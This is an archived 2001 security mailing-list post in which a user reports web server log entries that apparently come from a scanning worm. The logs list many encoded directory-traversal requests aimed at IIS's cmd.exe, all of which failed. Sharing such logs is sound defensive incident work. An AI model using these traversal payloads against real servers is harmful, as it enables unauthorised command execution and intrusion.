Possible new worm using directory traversal vulnerability?

From: thomas lakofski (thomasat_private)
Date: Tue Sep 18 2001 - 07:13:14 PDT

Next message: Dave Sill: "Re: Concept Virus(CV) V.5 - Advisory and Quick analysis"

Previous message: Christopher X. Candreva: "Re: New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

found this in my logs this afternoon, you may find it interesting.  from what I
can tell it's following a similar pattern of address scanning as CRII -- looks
like too many hosts, too quickly to be manual scanning:

here's a sample, the full log is at http://88.net/~thomas/codeindigo.txt [for
want of a better name]

209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:02 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:05 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:06 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

regards,

-thomas


-- 
 Do what thou wilt shall be the whole of the Law.
                -- Aleister Crowley
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4  F053 4AE5 01DF 81FD 4B43



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Dave Sill: "Re: Concept Virus(CV) V.5 - Advisory and Quick analysis"
Previous message: Christopher X. Candreva: "Re: New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:11:19 PDT